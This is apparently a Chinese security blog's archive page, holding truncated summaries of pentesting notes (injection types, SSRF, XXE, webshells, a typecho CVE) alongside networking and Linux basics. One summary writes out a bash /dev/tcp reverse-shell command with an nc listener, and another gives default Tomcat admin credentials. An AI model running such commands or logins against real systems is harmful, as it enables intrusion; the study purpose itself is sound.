11 2021 档案
摘要:0x00 bash 反弹 常规版本 攻击机上监听 nc -lvvp port 目标机上执行 bash -i >& /dev/tcp/IP/端口 0>&1 解释 bash -i 打开一个交互的bash & 将标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port 意为调用socket
阅读全文
摘要:0x00 身份认证安全 暴力破解 撞库 Cookie伪造 Session会话固定攻击 加密测试 0x01 数据篡改 手机号 邮箱和用户名 商品编号 用户ID 金额数据 本地JS参数 0x02 未授权访问 越权 水平越权 垂直越权 0x03 任意密码找回 0x04 验证码突破 0x05 接口调用安全
阅读全文
摘要:0x00 Tomcat put请求上传恶意代码 影响版本:7.0.0-7.0.81 弱口令进后台部署war包 后台路径一般为/manager 后台弱口令: tomcat:tomcat admin:admin 手动生成的war包访问的时候路径为war包名字+war包里面的jsp 手动生成war过程:
阅读全文
摘要:0x00 SSRF 漏洞概述 SSRF漏洞概述 SSRF( Server- side Request Forge,服务端请求伪造 )是一种由攻击者构造 形成由服务端发起请求 的安全漏洞。一般 情况下,SSRF攻击的目标是从外网无法访问的内部系统 。正是因为它是由服务端发起的,所以它能够请求到与它相连
阅读全文
摘要:0x00 XML 基础知识 ⅩML 介绍 XML 是 The Extensible Markup Language(可扩展标识语言)的简写。 XML最初的目的是弥补 HTML 的不足,后来逐渐用于网络数据的转换和描述 ,XML 的设计宗旨是传输数据 XML在 web 中的应用已十分广泛。XML 是各
阅读全文
摘要:0x00 CSRF 漏洞概述 跨站请求伪造 (Cross- site request forgery, CSRF)是一种攻击,它强制终端用户在当前对其进行身份验证后的 web 应用程序上执行非本意的操作。CSRF 攻击的着重点在伪造更改状态的请求 ,而不是盗取数据 ,因为攻击者无法查看对伪造请求的响
阅读全文
摘要:0x00 XSS 前置知识 什么是 BOM 浏览器对象模型(Browser Object Model (BOM)) 由于现代浏览器已经(几乎)实现了 JavaScript 交互性方面的相同方法和属性,因此常被认为是 BOM 的方法和属性。 例如: Window 对象 所有浏览器都支持 window
阅读全文
摘要:0x00 序列化与反序列化 语言结构 序列化的定义是,将对象的状态信息 转换为可以存储或传输的形式 (字符串)的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单的说,序列化就是把**—个对象变成可以传输的字符串**
阅读全文
摘要:0x00 RCE漏洞 概述 RCE = 命令执行+代码执行 漏洞的产生原因 代码层过滤不严。应用程序直接或间接使用了动态执行命令的危险函数 ,并且这个函数的运行参数是可控的 系统的漏洞造成命令注入 漏洞的本质 应用有时需要调用一些执行系统命令的函数,当服务器没有严格过滤用户提供的参数 时,就有可能导
阅读全文
摘要:0x00文件包含漏洞 概述 什么是文件包含 程序开发人员通常会把可重复使用的函数 写到单个文件中,在使用某个函数的时候,直接调用此文件 ,无需再次编写,这种调用文件的过程通常称为包含。 造成文件包含的原因 为了代码更灵活,通常会把被包含的文件设置为变量 ,进行动态调用 ,从而导致客户端可以调用任意文
阅读全文
摘要:0x00文件上传漏洞 概述 什么是文件上传漏洞 文件上传漏洞是指程序员在开发仼意文件上传功能时, 并未考虑文件格式后缀的合法性校验或者是只考虑在前端通过 js 进行后缀检验 。这时攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如 jsp、asp、php、aspx 文件后缀)到服务器上,
阅读全文
摘要:0x00 sqlmap 简单介绍 什么是sqlmap? sqlmap是一个开源的渗透测试工具,它自动化了检测和利用SQL注入缺陷 以及接管数据库服务器的过程。它配备了一个强大的检测引擎 ,以及终极渗透测试仪中的许多小众功能,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获
阅读全文
摘要:0x00 WAF 概述 什么是 WAF 全称 Web Application Firewall(WEB 应用防护系统),与传统的 Firewall(防火墙)不同,WAF 针对的是应用层 WAF 是通过执行一系列 针对 HTTP/HTTPS 的安全策略来专门为 Web 应用提供保护 的种网络安全产品
阅读全文
摘要:0x00 数据外带平台 平台网址 平台简介 http://dnslog.cn/ 仅支持DNS数据外带 http://ceye.io/ 支持DNS和HTTP两种数据外带方式(推荐使用 ) 0x01 DNS外带 MYSQL 数据外带 外带原理 利用UNC路径去访问服务器,dns会有日志,通过子查询,将内
阅读全文
摘要:0x00 NoSQL 基础 什么是 NoSQL 数据库? NoSQL(NoSQL= Not Only SQL),意即“不仅仅是 SQL",泛指非关系型的数据库 。 随着互联网 web2.0 网站的兴起,传统的关系数据库在应付 web2.0 网站,特别是超大规模和高并发的 SNS 类型的 web2.0
阅读全文
摘要:0x00 Access简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Acce
阅读全文
摘要:0x00 Oracle基础 Oracle 基本使用 什么是Oracle数据库? Oracle公司目前是世界上最大的软件提供商之一,与它并列的还有 Microsoft与 Adode。并且随着 Oracle的发展,它已经成为了企业办公平台的最大软件提供商之一。 Oracle数据库是 Oracle (中文
阅读全文
摘要:0x00 MSSQL 基础 MSSQL系统自带库和表 系统自带库 MSSQL安装后默认带了6个数据库,其中4个系统级库:master,model,tempdb和msdb;2个示例库:NorthwindTraders和pubs。 系统级自带库 功能 master 系统控制数据库,包含所有配置信息,用户
阅读全文
摘要:0x00 MYSQL基础 MYSQL自带库和表 在Mysql5.0以上的版本中加入了一个information_schema这个自带库,这个库中包含了该数据库的所有数据库名、表名、列表,可以通过SQL注入来拿到用户的账号和口令,而Mysql5.0以下的只能暴力跑表名;5.0 以下是多用户单操作,5.
阅读全文
摘要:0x00 SQL注入 概述 当web应用向后台数据库传递Sql语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的Sql语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 例如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,
阅读全文
摘要:相关定义语法 a = b"Hello, world!" # bytes object b = "Hello, world!" # str object 字符串转字节 str --> bytes # 字符串转字节 str --> bytes print(str.encode(b)) # 默认 enco
阅读全文
摘要:0x00 通过DNS信息收集 收集:whois查询、站长查询、DNS域传输漏洞、DNS历史记录解析 CDN识别 Nslookup 多地ping查询网址 https://asm.ca.com/en/ping.php/ http://ping.chinaz.com/4https://ping.aizha
阅读全文
摘要:0x00 主机发现 -sL 仅仅是显示,扫描的IP数目,不会进行任何扫描 -sn ping扫描,即主机发现 -Pn 不检测主机存活 -PS/PA/PU/PY[portlist] TCP SYN Ping/TCP ACK Ping/UDP Ping发现 -PE/PP/PM 使用ICMPecho, ti
阅读全文
摘要:端口 服务 20,21 ftp(文件传输协议) 22 ssh(安全shell协议) 23 telnet(远程登录协议) 25 SMTP 发邮件 110 POP3 收邮件 53 DNS 80 http 443 https 135/445 smb 137/138/139 netbios 389 LDAP
阅读全文
摘要:0x00 漏洞简介 CVE-2018-18753 漏洞概述: typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意 PHP 代码。 影响版本:typecho1.0(14.10.10) 0x01 漏洞环境 上传源码
阅读全文
摘要:PHP基础 PHP概述 PHP (全称:PHP: Hypertext Preprocessor,即"PHP:超文本预处理器") 是一种通用开源脚本语言 目前最流行的网站开发语言 在几乎所有的平台中都可以运行 很多的企业都在使用PHP作为开发语言 PHP介绍 PHP是一种类C语言 它混合了C、Java
阅读全文
摘要:JavaScript基础 JavaScript定义 JavaScript是脚本语言,是一种轻量级的编程语言 JavaScript是可插入HTML页面的编程代码 JavaScript插入HTML页面后,可由所有的主流浏览器执行 JavaScript很容易学习 开发及运行环境 开发环境 :不需要编译成二
阅读全文
摘要:VLAN介绍与配置 VLAN概述 交换网络中的问题 VLAN(Virtual Local Area Network) 在物理网络上划分出逻辑网 ,对应OS模型第二层 VLAN划分不受端口物理位置限制,VLAN和普通物理网络有同样属性 第二层数据单播、广播只在一个VLAN内转发,不会进入其他VLAN中
阅读全文
摘要:NAT 网络地址转换 NAT产生背景 今天,无数快乐的互联网用户在尽情享受Internet带来的乐趣。他们浏览新闻,搜索资料,下载软件,广交新朋,分享信息,甚至于足不出户获取一切日用所需。企业利用互联网发布信息,传递资料和订单,提供技术支持,完成日常办公。然而,Internet在给亿万用户带来便利的
阅读全文
摘要:以太网帧结构 Ethernet II帧结构 Ethernet_II帧类型值大于等于1536(0×0600) 以太网帧结构的长度在64-1518字节之间 帧各字段说明 目的MAC地址(DMAC):接收方的MAC地址 源MAC地址(SMAC):发送方的MAC地址 上层协议类型(Type):用于识别上层协
阅读全文
摘要:IP地址详解 IP地址概念 就像用身份证号码来区别毎个人一样,为了区别 网上的每台计算机,我们给因特网上的每一台计算机一个唯一的编号 ,我们把它称为IP地址 IP地址就是一个唯一标识 ,是一段网络编码 ,由32位组成 IP地址格式 传统的IP地址由32个二进制位 组成,由于二进制使用起来不方便,因此
阅读全文
摘要:应用层概述 应用层协议原理 应用层协议的实现,只需要写出能够运行在不同的端系统(服务器、手机、电脑等)和通过网络彼此通信的程序。因为网络核心设备(路由器、交换机等,不包括端系统设备)并不在应用层上起作用,只在网络层及下面层次起作用,所以不需要为网络核心设备写对应的应用程序,即 开发应用程序的时候只需
阅读全文
摘要:传输层概述 传输层向它上面的应用层提供通信服务,使用它下面的网络层的服务。 传输层的功能 传输层 提供进程和进程 之间的端到端 逻辑通信。网络层 提供主机之间 的逻辑通信。 复用和分用。 传输层 对收到的报文进行差错检测 (首部 和数据部分 )。网络层 只检查IP数据报的首部 ,不检验数据部分 是否
阅读全文
摘要:ARP协议 ARP协议概述 ARP(Address Resolution Protocol)即地址解析协议 **, 用于实现从 ** IP 地址到 MAC 地址 的映射,即询问目标IP对应的MAC地址 。在以太网环境中,数据的传输所依懒的是MAC地址而非IP地址,而将已知IP地址转换为MAC地址的工
阅读全文
摘要:分层思想 分层思想:将复杂 的流程分解 为几个功能相对单一 的子过程 整个流程更加清晰 ,复杂问题简单化 更容易发现问题并针对性的解决问题 分层思想在网络中的应用 OSI模型 国际标准化组织(International Standard Organization,ISO)于1984年颁布了 开放系统
阅读全文
摘要:本文防火墙配置是基于 Windows Server 2008 R2 服务器进行叙述,其他Windows服务器版本仅供参考 防火墙安全策略 定义 :安全策略按照一定规则检查数据流是否可以通过防火墙的基本安全控制机制规则的本质 是:包过滤 防火墙安全策略的过程 作用 :根据定乂的规则 对经过防火墙的流量
阅读全文
摘要:安装IIS服务器 在服务器管理器中,选择"角色”添加角色 进入添加角色向导,在安装界面,选择服务器角色为:" Web服务器(IIS) " 角色服务勾选:应用程序开发 、FTP服务器后,等待安装 3.安装完成后检查80端口是否开放,并访问IP地址,出现如下图所示界面,表示安装成功 IIS中配置ASP网
阅读全文
摘要:DOS的概述 什么是Dos? Dos( Disk Operating System)是个使用得十分广泛的磁盘操作系统,连当前流行的 Windows9XME系统都是以 它为基础 常见的DoS有两种:旧BM公司的P-DOS和微软公司的MS-DoS,它们的功能、命令用途格式都相同,我们常用的是 MS-DO
阅读全文
摘要:本文防火墙配置是基于CentOS7进行叙述,其他linux版本仅供参考 防火墙概述 在 Centos7里有几种防火墙共存: firewalld 、 iptables 、 ebtables(基本不用)。 默认是使用 firewalld来管理 netfilter 子系统,不过底层调用的命令仍然是 ipt
阅读全文
摘要:CentOS三种安装软件方法 安装方式 说明 软件包管理工具(yum) 直接把rpm安装包需要依赖文件安装好,无需额外处理,简单方便 rpm二进制包 二进制安装包是已经编译好的,类型和 windows下的exe安装文件一样,直接安装即可。这种方式会有一些依赖问题,需要一一解决全部依赖问候才能成功安装
阅读全文
摘要:权限管理概述 为什么要进行权限管理? 因为在生产服务器上,如果要让普通用户登录,就要给他分配合理的权限,在服务器上需要为用户严格定义权限等级,否则如果所有人都是roσt权限,权限过高容易导致岀现误操作、盗取账号等风险。 Linux文件属性及权限说明 文件权限 输入命令ls -l ,可以查看文件的权限
阅读全文
摘要:用户和用户组的概念 用户 ———> 使用操作系统的人 Linux系统是一个多用户多任务的分时操作系统,任何一个要使用系统资源的用户,都必须首先向系统管理员申请一个账号,然后以这个账号的身份进入系统。 每个用户账号都拥有一个唯一的用户名和各自的口令。 用户组 ———> 具有相同权限系统的一组用户 用户
阅读全文
摘要:Linux文件系统目录结构介绍 Linux文件系统目录结构 (英文名: Linux File System Directory Structure): 要所文件系统目录结构我们就要先知道什么是文件系统,文件系统是操作系统用于明确存储设备(常见的是磁 盘,也有基于 NAND Flash的固态硬盘)或分
阅读全文
摘要:配置静态IP 查看本机动态IP,确认IP网段 终端输入ipconfig 或 netstat(基于 net_tools) 或者输入ip address 或ss 若使用VMware虚拟机,请打开 编辑→虚拟网络编辑器→对应虚拟机的网络模式选中→打开设置查看网关 su 切换 root 用户 备份网络配置文
阅读全文
摘要:0x00 简介 Vim是从 vi 发展出来的一个文本编辑器。代码补完、编译及错误跳转等方便编程的功能特别丰富,在程序员中被广泛使用。 简单的来说, vi 是老式的字处理器,不过功能已经很齐全了,但是还是有可以进步的地方。 vim 则可以说是程序开发者的一项很好用的工具。 连 vim 的官方网站 (h
阅读全文
摘要:计算机网络概述 计算机网络的基本概念 我们把计算机网络定义为 凡是将分布在不同地理位置 并具有独立功能 的多台计算机,通过通信设备和线路连接起来,在功能完善的网络软件(网络协议及网络操作系统等)支持下,以实现网络资源共享 和数据传输 为目的的系统,称为计算机网络。 可以从以下三个方面理解计算机网络:
阅读全文
摘要:Webshell介绍 什么是 WebShell webshell就是以asp、php、jsp或者cgj等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门 由于 webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具 攻击者可以利用 webshell从而达到长期控制网
阅读全文
摘要:什么是Linux命令 Linux命令(英文:Linux commands) 长久以来呢,Linux操作系统以其稳定、高效且可靠等优点被大量的应用于企业服务器领域。大部分对 Linux服务器的管理和维护都是通过远程登录的方式来进行的。而绝大部分的管理维护操作都是基于 Linux命令来实现的,所以Lin
阅读全文
摘要:操作系统分类 计算机操作系统主要分类 操作系统包含:类Unix和 Windows两大阵营。 Windwos包含: Windows PC、 Windows Server等。 我们常见的 Win PC版系统有WinXP、win7、Win10等 其中WinXP常被用于银行,ATM等更新换代比较慢的地方。
阅读全文
浙公网安备 33010602011771号